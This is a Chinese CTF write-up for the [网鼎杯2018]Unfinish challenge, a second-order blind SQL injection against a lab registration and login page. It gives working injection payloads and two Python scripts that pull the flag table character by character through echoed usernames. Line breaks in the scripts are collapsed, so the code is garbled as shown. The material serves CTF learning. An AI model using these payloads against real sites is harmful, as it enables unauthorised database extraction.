当前位置：首页 > news >正文

[网鼎杯2018]Unfinish 两种方法 -----不会编程的崽

news 2025/6/3 18:40:43

网鼎杯太喜欢搞二次注入了吧。上次是无列名盲注，这次又是二次注入盲注。。。不知道方法还是挺难的。哎，网鼎嘛，能理解透彻就很强了。能自己做出来那可太nb了。

又是熟悉的登录框。不知道这是第几次看见网鼎杯的登录框了。后台扫描一下，会发现存在register.php。那还说什么，注册呗。

明显了，账号名会回显，且登录不需要用户名。这里就可能出现注入。既然要注入，就要闭合引号。

经过尝试，当构造如下payload。用户名就变成了1

0'||'1

下边这个payload也会返回1。判断数据库的第一个字母是否为w。

0'||ascii(substr(database() from 1 for 1))='119'||'0

数据库名为web。这里from与for代替了逗号。很抽象的是它过滤了imformation并且还限制了账户名的长度。这要怎么爆破表啊，啊啊啊啊！

去看大佬的wp，都说是猜的表名flag。。。打ctf都靠猜是吧。

这里还有一个问题，就是脚本。因为它这个账号必须每次换一个脚本要特别注意账号是否重复

0'||ascii(substr((select * from flag) from 1 for 1))=102||'0

因为盲注需要有判断标志，所以使用beautifulsoup获取网页元素。当然也可以使用正则表达式。呜呜呜，我不会正则表达式的写法。脚本写的很烂，大家见谅。

import requests
from bs4 import BeautifulSoup
import timeurl_r='http://bc79444f-d493-45e1-b3d5-3efd45777843.node5.buuoj.cn:81/register.php'
url_l='http://bc79444f-d493-45e1-b3d5-3efd45777843.node5.buuoj.cn:81/login.php'
flag=''
for i in range(1,500,1):for y in range(32,128,1):data_r={'email': '{}@{}'.format(i+500,y),'username':"0'||ascii(substr((select * from flag) from {} for 1))={}||'0".format(i,y),'password': '1'}data_l={'email': '{}@{}'.format(i+500,y),'password': '1'}content_r=requests.post(url_r,data=data_r)time.sleep(0.5)content = requests.post(url_l,data=data_l)#print(content.text)soup = BeautifulSoup(content.content, 'lxml')name = soup.find('span', {'class': 'user-name'})if name.string.strip()=='1':flag=flag+chr(y)print(flag)if '}' in flag:break

这里我就跑一半吧，实在是太慢了。

这个判断依据是登陆后账户名是1还是0。缺点就是速度很慢。下边还有一种速度很快的方法。可以学习一下。

利用+号。加号在mysql里当作运算符使用。

0'+1+'0=10'+ascii(substr((select * from flag) from 1 for 1))+'0=102

你看，的确返回了102

这样构造脚本，运行速度就快很多很多。当然上边那个你也可以开多线程

import requests
from bs4 import BeautifulSoup
import timeurl_r='http://7cacd614-4f7e-4099-bd5d-ef3f5ff0009a.node5.buuoj.cn:81/register.php'
url_l='http://7cacd614-4f7e-4099-bd5d-ef3f5ff0009a.node5.buuoj.cn:81/login.php'
flag=''
for i in range(1,500,1):data_r={'email': '5@{}'.format(i),'username':"0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i),'password': '1'}data_l={'email': '5@{}'.format(i),'password': '1'}content_r=requests.post(url_r,data=data_r)time.sleep(0.5)content = requests.post(url_l,data=data_l)soup = BeautifulSoup(content.content, 'lxml')name = soup.find('span', {'class': 'user-name'})flag=flag+chr(int(name.string.strip()))print(flag)if '}' in flag:break

这个就快多了，1分钟不到就拿到了。有些人一直问，不就是一个普通的盲注吗，有必要用+这类的奇淫妙计吗？要是你不会的话，确实可以使用最原始的方法，但性能上的期望就远远低了。所以新的方法还是要学的.

[网鼎杯2018]Unfinish 两种方法 -----不会编程的崽

网鼎杯太喜欢搞二次注入了吧。上次是无列名盲注，这次又是二次注入盲注。。。不知道方法还是挺难的。哎，网鼎嘛，能理解透彻就很强了。能自己做出来那可太nb了。又是熟悉的登录框。不知道这是第几次看见网鼎杯的登录框了。后台扫描一下&#x…...

编程日记 2024/3/26 10:17:04

安防监控视频汇聚平台EasyCVR在银河麒麟V10系统中的启动异常及解决方法

安防监控视频平台EasyCVR具备较强的兼容性，它可以支持国标GB28181、RTSP/Onvif、RTMP，以及厂家的私有协议与SDK，如：海康ehome、海康sdk、大华sdk、宇视sdk、华为sdk、萤石云sdk、乐橙sdk等。平台兼容性强，支持Windows系…...

编程日记 2024/3/26 10:11:59

了解云原生

声明：内容来自AI，未经验证，仅供参考! 1、云原生学习路线学习云原生(Cloud Native)技术涉及了解和掌握一系列的概念、技术和工具。云原生是一种构建和运行应用程序的方法，旨在充分利用云计算的灵活性、可伸缩性和弹性。以下是一…...

编程日记 2024/3/26 10:09:57

【go从入门到精通】for和for range的区别

作者简介： 高科，先后在 IBM PlatformComputing从事网格计算，淘米网，网易从事游戏服务器开发，拥有丰富的C，go等语言开发经验，mysql，mongo，redis等数据库，设计模…...

编程日记 2024/3/26 10:06:54

【C语言】【Leetcode】88. 合并两个有序数组

文章目录一、题目二、思路再思考一、题目链接: link 二、思路这题属于简单题，比较粗暴的做法就是直接比较两个数组，先把第二个数组加到第一个的后面，如何冒泡排序，这种方法简单粗暴但有效，可是不适用于这题&…...

编程日记 2024/3/26 10:04:52

DMA控制器

前言大家好，我是jiantaoyab，这是我作为学习笔记的25篇，本篇文章给大家介绍DMA。无论 I/O 速度如何提升，比起 CPU，总还是太慢。如果我们对于 I/O 的操作，都是由 CPU 发出对应的指令，然后等待…...

编程日记 2024/3/26 10:01:49

SQLiteC/C++接口详细介绍sqlite3_stmt类（十）

返回：SQLite—系列文章目录上一篇：SQLiteC/C接口详细介绍sqlite3_stmt类（九） 下一篇： SQLiteC/C接口详细介绍sqlite3_stmt类（十一） 38、sqlite3_column_value sqlite3_column_valu…...

编程日记 2024/3/26 10:00:47

Android 生成Excel文件保存到本地

本文用来记录在安卓中生成Excel文件并保存到本地操作，在网上找了好久，终于找到一个可以用的，虽然代码已经很老的，但亲测可用！ 项目地址：https://github.com/wanganan/AndroidExcel 可以下载下来修改直接用…...

编程日记 2024/3/26 9:55:42

Hive-技术补充-ANTLR语法编写

一、导读我们学习一门语言，或外语或编程语言，是不是都是要先学语法，想想这些语言有哪些相同点 1、中文、英语、日语......是不是都有主谓宾的规则 2、c、java、python、js......是不是都有数据类型、循环等语法或数据结构虽然人们在…...

编程日记 2024/3/26 9:54:41

6.使用个人用户登录域控的成员服务器，如何防止个人用户账号的用户策略生效？

（1）需求： （2）实战配置步骤第一步:创建新的策略-并编辑策略第二步：将策略应用到服务器处在OU 第三步：测试 （1）需求： 比如域控，或者加入域的…...

编程日记 2024/3/26 9:53:39

模拟算法

例题一算法思路： 纯模拟。从前往后遍历整个字符串，找到问号之后，就⽤ a ~ z 的每⼀个字符去尝试替换即可。例题二解法（模拟分情况讨论）： 算法思路： 模拟分情况讨论。计算相邻两个…...

编程日记 2024/3/26 9:52:35

二叉树二叉树刷题框架二叉树的定义： struct TreeNode {int val;TreeNode* left;TreeNode* right;TreeNode(int x) : val(x), left(NULL), right(NULL); };1 二叉树的遍历方式【1】前序遍历 class Solution { public:void traversal(TreeNode* node, vector&…...

编程日记 2024/3/26 9:51:33

基于AWS云服务构建智能家居系统的最佳实践

在当今智能家居时代,构建一个安全、高性能、可扩展和灵活的智能家居系统已经成为许多公司的目标。亚马逊网络服务(AWS)提供了一系列云服务,可以帮助企业轻松构建和管理智能家居系统。本文将探讨如何利用AWS云服务构建一个智能家居系统,并分享相关的最佳实践。系统架构概述该…...

编程日记 2024/3/26 9:48:30

Java零基础-集合：Set接口

哈喽，各位小伙伴们，你们好呀，我是喵手。今天我要给大家分享一些自己日常学习到的一些知识点，并以文字的形式跟大家一起交流，互相学习，一个人虽可以走的更快，但一群人可以走的更远。我是一名后…...

编程日记 2024/3/26 9:47:28

数据结构与算法-排序算法

1.顺序查找 def linear_search(iters, val):for i, v in enumerate(iters):if v val:return ireturn 2.二分查找 # 升序的二分查找 def binary_search(iters, val):left 0right len(iters)-1while left < right:mid (left right) // 2if iters[mid] val:return mid…...

编程日记 2024/3/26 9:45:26

SpringBoot 文件上传（三）

之前讲解了如何接收文件以及如何保存到服务端的本地磁盘中： SpringBoot 文件上传（一)-CSDN博客 SpringBoot 文件上传（二）-CSDN博客这节讲解如何利用阿里云提供的OSS（Object Storage Service)对象存储服务保存文件。…...

编程日记 2024/3/26 9:44:22

web渗透测试漏洞流程：红队目标信息收集之资产搜索引擎收集

web渗透测试漏洞流程渗透测试信息收集---域名信息收集1.域名信息的科普1.1 域名的概念1.2 后缀分类1.3 多重域名的关系1.4 域名收集的作用1.5 DNS解析原理1.6 域名解析记录2. 域名信息的收集的方法2.1 基础方法-搜索引擎语法2.1.1 Google搜索引擎2.1.1.1 Google语法的基本使用…...

编程日记 2024/3/26 9:39:17

UI自动化_id 元素定位

## 导包selenium from selenium import webdriver import time1、创建浏览器驱动对象 driver webdriver.Chrome() 2、打开测试网站 driver.get("你公司的平台地址") 3、使浏览器窗口最大化 driver.maximize_window() 4、在用户名输入框中输入admin driver.find_ele…...

编程日记 2024/3/26 9:36:13